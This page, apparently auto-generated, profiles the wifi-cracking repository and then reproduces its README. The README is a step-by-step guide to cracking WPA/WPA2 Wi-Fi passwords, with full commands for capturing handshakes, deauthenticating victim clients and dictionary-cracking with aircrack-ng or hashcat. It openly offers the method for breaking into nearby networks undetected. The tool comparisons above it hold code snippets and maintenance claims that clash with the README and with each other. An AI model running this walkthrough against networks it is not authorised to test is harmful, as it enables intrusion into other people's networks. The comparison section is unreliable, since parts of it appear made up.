Convert Figma logo to code with AI

brannondorsey logowifi-cracking

Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat

11,378
1,092
11,378
70
View on GitHub

Top Related Projects

aircrack-ng's avatar

aircrack-ng

5,347

WiFi security auditing tools suite

wifiphisher's avatar

wifiphisher

13,190

The Rogue Access Point Framework

derv82's avatar

wifite2

6,382

Rewrite of the popular wireless network auditor, "wifite"

s0lst1c3's avatar

eaphammer

2,126

Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks.

v1s1t0r1sh3r3's avatar

airgeddon

6,450

This is a multi-use bash script for Linux systems to audit wireless networks.

sensepost's avatar

mana

1,086

*DEPRECATED* mana toolkit for wifi rogue AP attacks and MitM

Quick Overview

The brannondorsey/wifi-cracking repository is a comprehensive guide and toolkit for cracking WPA/WPA2 Wi-Fi networks. It provides step-by-step instructions, scripts, and resources for ethical hacking and penetration testing of wireless networks. The project aims to educate users about Wi-Fi security vulnerabilities and promote better network protection practices.

Pros

  • Detailed and well-documented guide for Wi-Fi security testing
  • Includes scripts and tools to automate various aspects of the cracking process
  • Promotes awareness of Wi-Fi security vulnerabilities
  • Regularly updated with new techniques and best practices

Cons

  • Potential for misuse by malicious actors
  • Requires advanced technical knowledge to use effectively
  • May encourage illegal activities if not used responsibly
  • Some techniques may not work on newer, more secure Wi-Fi implementations

Getting Started

To get started with the wifi-cracking toolkit, follow these steps:

  1. Clone the repository:

    git clone https://github.com/brannondorsey/wifi-cracking.git
cd wifi-cracking

  2. Install required dependencies:

    sudo apt-get install aircrack-ng

  3. Read the README.md file for detailed instructions on using the tools and scripts provided in the repository.

  4. Follow the step-by-step guide to capture a handshake, create a wordlist, and attempt to crack the Wi-Fi password.

Note: Ensure you have permission to test the Wi-Fi network and comply with all applicable laws and regulations.

Competitor Comparisons

aircrack-ng logo

aircrack-ng

5,347

WiFi security auditing tools suite

Pros of aircrack-ng

  • More comprehensive suite of tools for wireless network security assessment
  • Actively maintained with regular updates and bug fixes
  • Supports a wider range of wireless network protocols and attack vectors

Cons of aircrack-ng

  • Steeper learning curve due to its extensive feature set
  • Requires more system resources and dependencies
  • Command-line interface may be less user-friendly for beginners

Code Comparison

aircrack-ng:

airmon-ng start wlan0
airodump-ng wlan0mon
aireplay-ng -0 2 -a BSSID -c CLIENT wlan0mon
aircrack-ng -w wordlist.txt capture.cap

wifi-cracking:

sudo ./wifi-cracking.sh

The wifi-cracking repository provides a simplified shell script that automates the process of capturing and cracking Wi-Fi passwords using aircrack-ng tools. It offers a more streamlined approach for beginners but with less flexibility compared to using aircrack-ng directly.

aircrack-ng is a more powerful and versatile tool suite, offering granular control over various wireless network security assessment tasks. It provides individual commands for different stages of the process, allowing for more customization and advanced usage scenarios.

While wifi-cracking simplifies the process, aircrack-ng offers more options for experienced users who require fine-tuned control over their wireless security assessments.

wifiphisher logo

wifiphisher

13,190

The Rogue Access Point Framework

Pros of Wifiphisher

  • More comprehensive and automated attack framework
  • Includes phishing capabilities for credential harvesting
  • Actively maintained with regular updates

Cons of Wifiphisher

  • More complex setup and usage
  • Requires more system resources
  • May be overkill for simple WiFi cracking tasks

Code Comparison

Wifi-cracking (basic command):

sudo ./wifi-cracking.sh wlan0 target_ssid

Wifiphisher (basic command):

sudo wifiphisher -i wlan0 -e target_ssid -p firmware-upgrade

Wifi-cracking focuses on a straightforward approach to cracking WiFi passwords, while Wifiphisher offers a more sophisticated attack framework with additional features like phishing. Wifi-cracking is simpler to use but less versatile, whereas Wifiphisher provides more options but requires more setup and understanding.

Wifi-cracking is better suited for users who want a quick and easy way to test WiFi security, while Wifiphisher is more appropriate for advanced penetration testers and security professionals who need a comprehensive tool for various wireless attacks.

Both tools serve different purposes and cater to different skill levels, making the choice between them dependent on the user's specific needs and expertise.

derv82 logo

wifite2

6,382

Rewrite of the popular wireless network auditor, "wifite"

Pros of wifite2

  • Automated tool with a user-friendly interface for Wi-Fi auditing
  • Supports multiple attack methods and tools in one package
  • Actively maintained with regular updates and bug fixes

Cons of wifite2

  • May require more system resources due to its comprehensive nature
  • Learning curve for advanced features and customization options
  • Potential for false positives in certain scenarios

Code comparison

wifite2:

def crack_handshake(handshake, wordlist):
    cmd = ['aircrack-ng', handshake, '-w', wordlist]
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = proc.communicate()
    return stdout, stderr

wifi-cracking:

aircrack-ng -w rockyou.txt -b 58:98:35:CB:A2:77 ~/handshake.cap

Summary

wifite2 offers a more comprehensive and automated approach to Wi-Fi security testing, with a wider range of features and attack methods. It's actively maintained and provides a user-friendly interface. However, it may require more resources and has a steeper learning curve for advanced usage.

wifi-cracking, on the other hand, provides a simpler, more straightforward approach with basic scripts and instructions. It's easier to understand for beginners but lacks the automation and extensive features of wifite2.

The code comparison shows that wifite2 uses Python for more complex operations, while wifi-cracking relies on direct command-line usage of tools like aircrack-ng.

s0lst1c3 logo

eaphammer

2,126

Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks.

Pros of eaphammer

  • More comprehensive toolkit for targeted evil twin attacks
  • Includes features like hostile portal attacks and indirect wireless pivots
  • Actively maintained with regular updates and improvements

Cons of eaphammer

  • Steeper learning curve due to more complex features
  • Requires more setup and dependencies
  • May be overkill for basic WiFi cracking tasks

Code comparison

eaphammer:

def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('--interface', required=True, help='Wireless interface in monitor mode')
    parser.add_argument('--essid', required=True, help='Target ESSID')
    parser.add_argument('--bssid', required=True, help='Target BSSID')
    return parser.parse_args()

wifi-cracking:

#!/bin/bash
interface=wlan0
bssid=00:11:22:33:44:55
channel=1

eaphammer offers a more structured approach with argument parsing, while wifi-cracking uses simpler bash variables. eaphammer's code suggests a more feature-rich and flexible tool, aligning with its comprehensive nature. wifi-cracking's simplicity makes it easier to understand and modify for basic tasks.

Both repositories serve as WiFi security testing tools, but eaphammer is more advanced and feature-rich, while wifi-cracking focuses on simplicity and ease of use for basic WiFi cracking techniques. The choice between them depends on the user's needs and expertise level.

v1s1t0r1sh3r3 logo

airgeddon

6,450

This is a multi-use bash script for Linux systems to audit wireless networks.

Pros of airgeddon

  • More comprehensive suite of wireless auditing tools
  • Actively maintained with regular updates
  • User-friendly interface with menu-driven options

Cons of airgeddon

  • Steeper learning curve due to more complex features
  • Requires more dependencies and setup time
  • May be overkill for simple WiFi cracking tasks

Code Comparison

airgeddon:

#!/usr/bin/env bash
...
function initialize_script_settings() {
    debug_mode=0
    language="ENGLISH"
    ...
}

wifi-cracking:

#!/bin/bash
...
echo "Capturing packets..."
airodump-ng -c $CHANNEL --bssid $BSSID -w $CAPTURE_FILE $WIRELESS_INTERFACE

airgeddon offers a more structured and modular approach with functions and settings, while wifi-cracking provides a simpler, straightforward script for basic WiFi cracking tasks. airgeddon's code is more extensive and organized, reflecting its broader feature set, whereas wifi-cracking focuses on a specific workflow with minimal complexity.

Both projects serve different needs: airgeddon is better suited for advanced users and penetration testers requiring a full suite of wireless auditing tools, while wifi-cracking is ideal for those seeking a quick and simple WiFi cracking solution with a gentler learning curve.

sensepost logo

mana

1,086

*DEPRECATED* mana toolkit for wifi rogue AP attacks and MitM

Pros of mana

  • More comprehensive toolkit for WiFi attacks and auditing
  • Includes advanced features like rogue access point creation
  • Actively maintained with regular updates

Cons of mana

  • Steeper learning curve due to more complex features
  • Requires more setup and configuration
  • May be overkill for basic WiFi cracking tasks

Code comparison

mana (setup.sh):

#!/bin/bash
apt-get update
apt-get install -y hostapd dnsmasq
git clone https://github.com/sensepost/hostapd-mana.git
cd hostapd-mana
make
make install

wifi-cracking (crack-wifi.sh):

#!/bin/bash
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon
sudo aireplay-ng --deauth 0 -a [BSSID] wlan0mon

mana offers a more comprehensive suite of tools for WiFi attacks and auditing, including advanced features like rogue access point creation. It's actively maintained and regularly updated. However, it has a steeper learning curve and requires more setup compared to wifi-cracking.

wifi-cracking is simpler and more focused on basic WiFi cracking tasks, making it easier for beginners to use. It provides a straightforward approach to capturing and cracking WiFi passwords but lacks some of the advanced features found in mana.

The code comparison shows that mana requires more setup and installation of additional tools, while wifi-cracking uses built-in aircrack-ng suite commands for its operations.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

Wi-Fi Cracking

Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat.

This is a brief walk-through tutorial that illustrates how to crack Wi-Fi networks that are secured using weak passwords. It is not exhaustive, but it should be enough information for you to test your own network's security or break into one nearby. The attack outlined below is entirely passive (listening only, nothing is broadcast from your computer) and it is impossible to detect provided that you don't actually use the password that you crack. An optional active deauthentication attack can be used to speed up the reconnaissance process and is described at the end of this document.

If you are familiar with this process, you can skip the descriptions and jump to a list of the commands used at the bottom. For a variety of suggestions and alternative methods, see the appendix. neal1991 and tiiime have also graciously provided translations to this document and the appendix in Chinese if you prefer those versions.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use. Don't be a dick.

Getting Started

This tutorial assumes that you:

  • Have a general comfortability using the command-line
  • Are running a debian-based linux distro, preferably Kali linux (OSX users see the appendix)
  • Have Aircrack-ng installed
    • sudo apt-get install aircrack-ng
  • Have a wireless card that supports monitor mode (see here for a list of supported devices)

Cracking a Wi-Fi Network

Monitor Mode

Begin by listing wireless interfaces that support monitor mode with:

airmon-ng

If you do not see an interface listed then your wireless card does not support monitor mode 😞

We will assume your wireless interface name is wlan0 but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:

airmon-ng start wlan0

Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon).

Find Your Target

Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface:

airodump-ng mon0

You should see output similar to what is below.

CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49                                         
                                                                                                                                              
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                              
 14:91:82:F7:52:EB  -66      205       26    0   1  54e  OPN              belkin.2e8.guests                                                   
 14:91:82:F7:52:E8  -64      212       56    0   1  54e  WPA2 CCMP   PSK  belkin.2e8                                                          
 14:22:DB:1A:DB:64  -81       44        7    0   1  54   WPA2 CCMP        <length:  0>                                                        
 14:22:DB:1A:DB:66  -83       48        0    0   1  54e. WPA2 CCMP   PSK  steveserro                                                          
 9C:5C:8E:C9:AB:C0  -81       19        0    0   3  54e  WPA2 CCMP   PSK  hackme                                                                 
 00:23:69:AD:AF:94  -82      350        4    0   1  54e  WPA2 CCMP   PSK  Kaitlin's Awesome                                                   
 06:26:BB:75:ED:69  -84      232        0    0   1  54e. WPA2 CCMP   PSK  HH2                                                                 
 78:71:9C:99:67:D0  -82      339        0    0   1  54e. WPA2 CCMP   PSK  ARRIS-67D2                                                          
 9C:34:26:9F:2E:E8  -85       40        0    0   1  54e. WPA2 CCMP   PSK  Comcast_2EEA-EXT                                                    
 BC:EE:7B:8F:48:28  -85      119       10    0   1  54e  WPA2 CCMP   PSK  root                                                                
 EC:1A:59:36:AD:CA  -86      210       28    0   1  54e  WPA2 CCMP   PSK  belkin.dca

For the purposes of this demo, we will choose to crack the password of my network, "hackme". Remember the BSSID MAC address and channel (CH) number as displayed by airodump-ng, as we will need them both for the next step.

Capture a 4-way Handshake

WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airmon-ng to monitor traffic on the target network using the channel and bssid values discovered from the previous command.

# replace -c and --bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0

 CH  6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]                                        
                                                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                              
 9C:5C:8E:C9:AB:C0  -47   0      140        0    0   6  54e  WPA2 CCMP   PSK  ASUS

Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.

If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.

Once you've captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:

mv ./-01.cap hackme.cap

Crack the Network Password

The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.

Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.

Cracking With naive-hashcat (recommended)

Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.

cap2hccapx.bin hackme.cap hackme.hccapx

Next, download and run naive-hashcat:

# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat

# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:

e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet

Where the last two fields separated by : are the network name and password respectively.

If you would like to use hashcat without naive-hashcat see this page for info.

Cracking With Aircrack-ng

Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file:

# download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Note, that if the network password is not in the wordfile you will not crack the password.

# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap

If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.

                                 Aircrack-ng 1.2 beta3


                   [00:01:49] 111040 keys tested (1017.96 k/s)


                         KEY FOUND! [ hacktheplanet ]


      Master Key     : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 
                       59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E 

      Transient Key  : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 
                       2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 
                       6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 
                       8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21 

      EAPOL HMAC     : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

Deauth Attack

A deauth attack sends forged deauthentication packets from your machine to a client connected to the network you are trying to crack. These packets include fake "sender" addresses that make them appear to the client as if they were sent from the access point themselves. Upon receipt of such packets, most clients disconnect from the network and immediately reconnect, providing you with a 4-way handshake if you are listening with airodump-ng.

Use airodump-ng to monitor a specific access point (using -c channel --bssid MAC) until you see a client (STATION) connected. A connected client look something like this, where is 64:BC:0C:48:97:F7 the client MAC.

 CH  6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ]                                         
                                                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                           
 9C:5C:8E:C9:AB:C0  -19  75     1043      144   10   6  54e  WPA2 CCMP   PSK  ASUS                                                         
                                                                                                                                           
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                 
                                                                                                                                           
 9C:5C:8E:C9:AB:C0  64:BC:0C:48:97:F7  -37    1e- 1e     4     6479  ASUS

Now, leave airodump-ng running and open a new terminal. We will use the aireplay-ng command to send fake deauth packets to our victim client, forcing it to reconnect to the network and hopefully grabbing a handshake in the process.

# -0 2 specifies we would like to send 2 deauth packets. Increase this number
# if need be with the risk of noticeably interrupting client network activity
# -a is the MAC of the access point
# -c is the MAC of the client
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

You can optionally broadcast deauth packets to all connected clients with:

# not all clients respect broadcast deauths though
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0

Once you've sent the deauth packets, head back over to your airodump-ng process, and with any luck you should now see something like this at the top right: [ WPA handshake: 9C:5C:8E:C9:AB:C0. Now that you've captured a handshake you should be ready to crack the network password.

List of Commands

Below is a list of all of the commands needed to crack a WPA/WPA2 network, in order, with minimal explanation.

# put your network device into monitor mode
airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0

# optionally deauth a connected client to force a handshake
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

########## crack password with aircrack-ng... ##########

# download 134MB rockyou.txt dictionary file if needed
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack w/ aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap

########## or crack password with naive-hashcat ##########

# convert cap to hccapx
cap2hccapx.bin capture/-01.cap capture/-01.hccapx

# crack with naive-hashcat
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

Appendix

The response to this tutorial was so great that I've added suggestions and additional material from community members as an appendix. Check it out to learn how to:

  • Capture handshakes and crack WPA passwords on MacOS/OSX
  • Capture handshakes from every network around you with wlandump-ng
  • Use crunch to generate 100+GB wordlists on-the-fly
  • Spoof your MAC address with macchanger

A Chinese version of the appendix is also available.

Attribution

Much of the information presented here was gleaned from Lewis Encarnacion's awesome tutorial. Thanks also to the awesome authors and maintainers who work on Aircrack-ng and Hashcat.

Overwhelming thanks to neal1991 and tiiime for translating this tutorial into Chinese. Further shout outs to yizhiheng, hiteshnayak305, enilfodne, DrinkMoreCodeMore, hivie7510, cprogrammer1994, 0XE4, hartzell, zeeshanu, flennic, bhusang, tversteeg, gpetrousov, crowchirp and Shark0der who also provided suggestions and typo fixes on Reddit and GitHub. If you are interested in hearing some proposed alternatives to WPA2, check out some of the great discussion on this Hacker News post.